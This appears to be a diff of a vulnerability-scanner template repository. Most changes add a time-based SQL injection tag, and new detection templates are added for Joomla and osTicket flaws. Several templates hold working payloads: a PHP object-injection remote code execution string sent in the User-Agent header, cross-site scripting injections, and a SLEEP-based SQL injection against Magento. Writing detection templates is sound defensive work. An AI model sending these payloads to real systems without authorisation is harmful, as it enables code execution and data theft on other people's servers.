tags: time-based-sqli,cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'status_code == 200'
- 'contains(body_2, "newstatpress_page_nsp_search")'
condition: and
# digest: 490a0046304402206afe631ad8f093e0e82bb2d01736518d96616950971ac077d2ed68d07fc2209b02204867eca23d5337e9b83cb4066ed5a73d791aa434fe9f29e1b1f4762ae55b7368:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e0252d78abb451e9b3508dd9733adb456ea9f5a41268037aef0e6eca1d4303320220554bd533cd1baab8aad20fc9f3dccb5a319b328b480a6f029363115b7922cc20:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,62 @@
id: CVE-2015-8562
info:
name: Joomla HTTP Header Unauthenticated - Remote Code Execution
author: kairos-hk,bolkv,n0ming,RoughBoy0723
description: |
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
severity: high
reference:
- https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562
- https://nvd.nist.gov/vuln/detail/CVE-2015-8562
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2015-8562
metadata:
max-request: 2
vendor: joomla
product: joomla\!
shodan-query:
- http.html:"joomla! - open source content management"
- http.component:"joomla"
- cpe:"cpe:2.3:a:joomla:joomla\!"
fofa-query: body="joomla! - open source content management"
tags: cve,cve2015,joomla,rce,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"Joomla")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e9d585daa1c154a8a02cc56a9950cd6acf63af5aadea9ee9343e00847d05bf77022100a3f090d371c718e2cdb376477d31caa13c53141325dddb998a2722d21cb4248b:922c64590222798bb761d5b6d8e72950

View File

@ -29,7 +29,7 @@ info:
vendor: duckdev
product: 404_to_301
framework: wordpress
tags: cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev
tags: time-based-sqli,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "404-to-301")'
condition: and
# digest: 4b0a00483046022100c27236f98002c3fa3feb31b6084010a0885416d66e5f558006f1e087f2c42369022100de53fe3a0f1b9880b34c9db76ee96cd7e8fe47827ba3e6701ed0c0cd911b5942:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206e6e7dd877da87520e9728b32f5386752ac86d0582b6f4dec906e323cb09ab04022027471d6a5d1e20347d22983a5ed786ef95ba57cc750709594d63b455212bd279:922c64590222798bb761d5b6d8e72950

View File

@ -31,7 +31,7 @@ info:
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/gift-voucher/"
fofa-query: body="/wp-content/plugins/gift-voucher/"
tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen
tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen
http:
- raw:
@ -51,4 +51,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "images") && contains(body, "title")'
condition: and
# digest: 490a00463044022039c62ea7189c856952f0a35cfb1c5bcc09fd83a4aae6a766e8357ce6c29625e202204b8b8f1561357042ae671f4d7d5166f074ce46d7d8586fb02316afdd260df3bd:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e13c5de79aecef68dd8703a19cad639b46d46ac326ba001f9984084c5080fd0a022100a4e65fde4fa3b8c1d7d197d9f04ea147e94caf0ef409a54f4ced1916f0ed4578:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,75 @@
id: CVE-2018-7192
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "message" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7192
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7192
cwe-id: CWE-79
epss-score: 0.00172
epss-percentile: 0.54693
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /ajax.php/form/help-topic/1?a934f512c6644b03=&message=dgh7r%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20qavj5 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "dgh7r onmouseover=alert(document.domain) style=position:")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221009ec71e04f5587f9555c3a6455856fe0707c97016bf732bb2d32d3820c3c849990220474b01d82393e9e7e06e06b45821eebf52976c16c985bafab24e31a373fe90e5:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,75 @@
id: CVE-2018-7193
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "order" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7193
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7193
cwe-id: CWE-79
epss-score: 0.00172
epss-percentile: 0.54693
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/directory.php?&&order="><script>alert(document.domain);</script>&sort=dept HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><script>alert(document.domain);</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100cbec67f214c6e316f3cd571c048efe4b5fa30471027dd468a2389f12c0f5d6300220723b75f7d4347a6bd1b0a8d70329eee12753226569f662899a1c2fb853b4a7a4:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,73 @@
id: CVE-2018-7196
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "sort" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7196
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7196
cwe-id: CWE-79
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/index.php?sort="><script>alert(document.domain);</script>&dir=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><script>alert(document.domain);</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402202a3bfee629128ded92342fc0366e48e742ede36203e4d9989eb86598ea466e1502200b83765e3c103aa1bb774995dbad2ffcd07ab46b6a05c27e26c939dd4f48a023:922c64590222798bb761d5b6d8e72950

View File

@ -31,7 +31,7 @@ info:
fofa-query: title="printmonitor"
google-query: intitle:"printmonitor"
product": printmonitor
tags: cve2018,cve,sqli,printmonitor,unauth,titool
tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
@ -54,4 +54,4 @@ http:
- 'status_code == 200'
- 'contains(body, "PrintMonitor") && contains(header, "text/html")'
condition: and
# digest: 4a0a00473045022100ec573b18c670d29560ed71dcf93443f68e034fce66f06294bf0b23aeadb462e1022003bfb3d3de007d87998765d3ec871ac5efff191cf95c1a2f148e89d9a66816d5:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220350b85c022a2f7990b3549695690835a5a3c0eca188c61a231dcdbc042bacc8c0220182ccd815189f39984575638fc122b9947b072a99b8d98e22dec0d524e4ca452:922c64590222798bb761d5b6d8e72950

View File

@ -32,7 +32,7 @@ info:
- http.component:"Magento"
- cpe:"cpe:2.3:a:magento:magento"
- http.component:"magento"
tags: cve,cve2019,sqli,magento
tags: time-based-sqli,cve,cve2019,sqli,magento
flow: http(1) && http(2)
@ -55,7 +55,7 @@ http:
- raw:
- |
@timeout: 20s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
- |
@ -72,7 +72,7 @@ http:
- type: dsl
name: time-based
dsl:
- 'duration_1>=6'
- 'duration_1>=8'
- 'contains(content_type_1, "application/json")'
condition: and
@ -83,4 +83,4 @@ http:
- 'status_code_2 == 200 && status_code_3 == 400'
- 'len(body_2) == 2 && len(body_3) == 2'
condition: and
# digest: 4a0a0047304502205a69b6ef9b1728b6a46cb23445d714f64558e680f3e39937cb4d3800f7c59669022100f12e75e00939482a564c76ed2fdcc3b2319eccdce9539afd2805c5a4353a4a35:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a80a39e0c4a72d86fae82b5e46b7e70f22b03fbc5b52f694ca36560f81946c520220015ed98158a92faf65ae029e01eec1e7962bbb7273ee01c02c0ceffbcadd34c0:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: idangero
product: chop_slider
framework: wordpress
tags: cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero
tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "application/javascript")'
- 'contains(body, "$(document).ready(function()")'
condition: and
# digest: 4a0a00473045022100cf4f7ac39414a286782cc1465b2e846928bf6384fd900c4b102cef03995c8496022013ce04ef0b306d3248491918201ad410693f3e67d90d2b836a6faf942e301aa6:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206abae22800a03afe90c44ef6d3705a376f5aaa027225e4c7b4e7bed52864aaab022019592374fb3278a65252f94f4caabd678d0a98eb3d6e2ed59d8cfa4cf4d677e3:922c64590222798bb761d5b6d8e72950

View File

@ -31,7 +31,7 @@ info:
shodan-query: http.title:"fuel cms"
fofa-query: title="fuel cms"
google-query: intitle:"fuel cms"
tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
http:
- raw:
@ -65,4 +65,4 @@ http:
- 'status_code_3 == 200'
- 'contains(body_1, "FUEL CMS")'
condition: and
# digest: 490a0046304402204c4bf6a24a18789f4b4c053b1ede99fad9d47bbe442a41be6d1ff8f46e32a011022050174e6bebe598ce43b4b667f73bc6aad238238abed9332fd136e43b4feaa386:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022015d2201ff7a238aea6a71fe1375f8a1d608ec867a5f3956aea11a30fda642da802206370686dc03f6b7ea9742a3c1fa820d9559a43cd8ca463171ff0036b27f8eb9b:922c64590222798bb761d5b6d8e72950

View File

@ -29,7 +29,7 @@ info:
vendor: prestashop
product: productcomments
framework: prestashop
tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop
tags: time-based-sqli,cve,cve2020,packetstorm,sqli,prestshop,prestashop
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# digest: 4b0a00483046022100bfb60507528a715a3186e6f06262c9534c16003bc96c3baa4049108a3d06d67a0221008662896abf6d4938c136f30d2492fc638fb1157aea901a3875741b3251869743:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ba36b4b1b8b3de0a170016e0df7dc4bc129a2a432a66313495e10a2c5726b0220220641950cb27c6dfd36692ed81dc14d36385dc86e8b2c553c218672acb507375ba:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
vendor: goodlayers
product: good_learning_management_system
framework: wordpress
tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress
tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress
http:
- raw:
@ -46,4 +46,4 @@ http:
- "status_code == 200"
- "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"
condition: and
# digest: 4a0a00473045022100de8e68d9f94b82af184c4830778f5a38d929abe4ad7c1b9a60ab64389a0adf0102200abfa6c9701dce38f221abae9f7130bf100efa9f0c5232356ad4a034340561b1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022047ea54dad2e6f0b6e744ccaadbbb117fa2e46dcae0344ab5e33cfa881be486ab02210083f8497ca49054443bbd084df6eeeae0ba2a9f33a3453d8ce97fdc9b778b3265:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
fofa-query: body=/wp-content/plugins/wp-statistics/
publicwww-query: /wp-content/plugins/wp-statistics/
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs
tags: time-based-sqli,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs
http:
- raw:
@ -56,4 +56,4 @@ http:
- 'status_code_2 == 500'
- 'contains(body_2, ">WordPress &rsaquo; Error<") && contains(body_2, ">Your request is not valid.<")'
condition: and
# digest: 4a0a00473045022100f81cc6ae63a3716745a9d2b7b36392e91421d0e2429ef59ea0be12290d02643302204e0b0cd1ce6bc440c4c53e079c3bc7406fc60f36b6f79cf10bce774aee58942d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100accee4cf0582472a2200204cfef2221077c1dd6d3e58bfda460c7b81d553085902210099ae808f6eb88442a9b53e94eeb038b7af80d4962258bcde5adb7308ee95d052:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
shodan-query: http.html:/wp-content/plugins/polls-widget/
fofa-query: body=/wp-content/plugins/polls-widget/
publicwww-query: "/wp-content/plugins/polls-widget/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart
tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart
http:
- raw:
@ -48,4 +48,4 @@ http:
- 'status_code == 200'
- 'contains_all(body, "{\"answer_name", "vote\":")'
condition: and
# digest: 4a0a0047304502203414f57b4fe1500e69a1e44d86edb4c318855b78e1113d2423dd48e3a6931a04022100f3d562735c04bf9943dbdfb808ebfa20790e58f4c6f5643d8c89eb10e12c69e6:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dcb435610780d47753f97f6a5e59252f21a24518ce51b148b16b50d1090de4b5022100bb68a6f6afb34ccd43ff058d18ec33757aa803d16002f94b456d592a899644ec:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: freelancetoindia
product: paytm-pay
framework: wordpress
tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia
tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia
http:
- raw:
@ -53,4 +53,4 @@ http:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "paytm-settings_page_wp_paytm_donation")'
condition: and
# digest: 4b0a00483046022100b092e95ed6c8648f9314bf91ab75d65da7ed441e0f53438cb2f29fef0b3fc15d022100ad4c2f079591cb0fd9d7d2c4072ef01d722fee1c9c8e7385c0669f87453932c7:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022077c870303c44c07b438aa81a4bd842ebd26edc6163c3f19b6b0a3644e52f29cf0220472a02deab2f4c650074d0812c4bd9ebe923480459f4dc9986538698ddcbd18f:922c64590222798bb761d5b6d8e72950

View File

@ -27,7 +27,7 @@ info:
vendor: genetechsolutions
product: pie_register
framework: wordpress
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions
tags: time-based-sqli,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "User credentials are invalid.")'
condition: and
# digest: 4b0a00483046022100fb5b4e734fba05c09c1c094c94b84b400b14dcba5ef57448829d5b5d3016005a022100d239aadd95068d42bf67a4af289a4912b7ae0c574f6d7a721d993912ffcfd81c:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220043db5a1aa38db15da9b83bb8888849fc550589571bc4bc7d844e9973d7fa55e02201190ffe889da257be06b7a2163a9ae780b47f5fea107aae6867c33a7b0959243:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: getperfectsurvey
product: perfect_survey
framework: wordpress
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
http:
- raw:
@ -51,4 +51,4 @@ http:
- type: status
status:
- 404
# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206b8f505cf063a366677aff951ab3ac77b7a042733ab630621041ce8512afdfeb022100e3629201f4d6f5c29d073a6f5fe6e1ab99e571c0fc9b1f9d00dc70fc9c6ebcc1:922c64590222798bb761d5b6d8e72950

View File

@ -26,7 +26,7 @@ info:
product: header_footer_code_manager
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress
tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress
http:
- raw:
@ -49,4 +49,4 @@ http:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2,"Add New Snippet")'
condition: and
# digest: 4a0a0047304502210095714900b273532b79c9b68b4b7daad27ed4f8b54d5e90deef7d4e7820dc084702206369f1b610cf19a0d46bf27a00db0246bcaf269e93d481a69a1d44812064a241:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022045af518596bfcb30054d6f0284c6a3806c58e62a6faf3c250299f5fbfb448b06022058a760ac3ffc7cc75ea58c8bcde760ee3fbfbc63ea5bb88bc6338c1f2157a493:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: asgaros
product: asgaros_forum
framework: wordpress
tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros
tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "asgarosforum")'
condition: and
# digest: 4b0a00483046022100f0bde1de52443d3ddd17e9f337ab1944196721460c9f115b112be0cae1ccf101022100ea65d1cc352cc3a866999d55ce3fe60120bf86c60e25d1b34ce21d6e1997a677:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d8fd318ec87896aa55d82aafa093ed264a5ff5bf3d9be27458a435d3879e0ff8022100f73122c01a76630add3c2933188f4783e3f2ab0d301451748ab013bdc3fb7971:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
flow: http(1) && http(2)
http:
@ -68,4 +68,4 @@ http:
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f32bfb982d6b9ecf94822be9dda7549ba4b23cb290e4a01e636d46c7fe1fab8c0221008f0b3e8572758ce4a02c5101fcc49055884f2f6305b017bc1468bb213fdc8e07:922c64590222798bb761d5b6d8e72950

View File

@ -29,7 +29,7 @@ info:
vendor: metagauss
product: registrationmagic
framework: wordpress
tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss
tags: time-based-sqli,cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss
http:
- raw:
@ -54,4 +54,4 @@ http:
- 'status_code_2 == 200'
- 'contains(body_3, "rm_user_role_mananger_form")'
condition: and
# digest: 4a0a00473045022100e094ec14b2add716b2cc645857d709bbe7216d825cb1b18ce5b7733457860e2c02206859da8890901f7219e49f41586f721cfc4c7b1adfb4768948e8eaf03da4ba26:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022010a1241115e4534524145899ea6c8c560ba03ecb8a7562b81aea23abb010510e022023d95ae5fe85c8e4f30b630405b2f4698f59916a79a815573c68e139bc1c2ffb:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: ays-pro
product: secure_copy_content_protection_and_content_locking
framework: wordpress
tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro
tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro
http:
- raw:
@ -45,4 +45,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"status\":true")'
condition: and
# digest: 4b0a00483046022100bd6a79cdc594a3023fb8e143f8b3806237e2d1b610802729545d42772e7340e10221008215d1a8a12f869971241e710ddfd7c6f663f9e5a94326ce397d081c4f966528:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100bbcac16e6b972a8c13c9203a2eefab2763405a60eeac14738446293105ddcd85022100af007241e9719b7a25b44ede01a84b75fd606f0d58375c6b77f3a50f8a4dfabb:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/
fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/
publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp
tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp
variables:
text: "{{rand_base(5)}}"
@ -49,4 +49,4 @@ http:
- 'status_code == 200'
- 'contains(body, "Please enter the email you registered with")'
condition: and
# digest: 4b0a00483046022100baf26aa77d293a650d638df6fa36214c0344ec2c80457d29c0cec194f81aa415022100ab4c0c9979d914df0d42b4b1c65aae34aff3194e9127bdf1aa5c9d1fed8fdf11:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207bcb83ddc3ca2854b007d61bfce62f3e96e14119f6eb4798a2eec83b287fe9ff022100cccabc9e7b99444bfa23b3badaac419c8f3ee16951c27ecf13165a4892fe6d5a:922c64590222798bb761d5b6d8e72950

View File

@ -30,7 +30,7 @@ info:
vendor: webnus
product: modern_events_calendar_lite
framework: wordpress
tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus
tags: time-based-sqli,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
condition: and
# digest: 490a00463044022005a0ed6fd4a954f355471debb3135a50f8aa1fc8f46d755cdf7ec6fbad2ebb11022005f3d8ac225181d1a9a4a8514d1810eb4fee21dc685447ccceea3418b5f6a24c:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205ad6223a657a0318d15e4003c38dce2d9781705d2d06f7f50a4e8a372cf24f5f02200cfe153e0bd8c4ee1258e08ce63c0041c0faaddafca973ee4d272d4db3530b40:922c64590222798bb761d5b6d8e72950

View File

@ -34,7 +34,7 @@ info:
fofa-query: body=/wp-content/plugins/paid-memberships-pro/
publicwww-query: /wp-content/plugins/paid-memberships-pro/
google-query: inurl:"/wp-content/plugins/paid-memberships-pro"
tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios
tags: time-based-sqli,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios
http:
- raw:
@ -54,4 +54,4 @@ http:
- status_code == 200
- contains(body_2, 'other_discount_code_')
condition: and
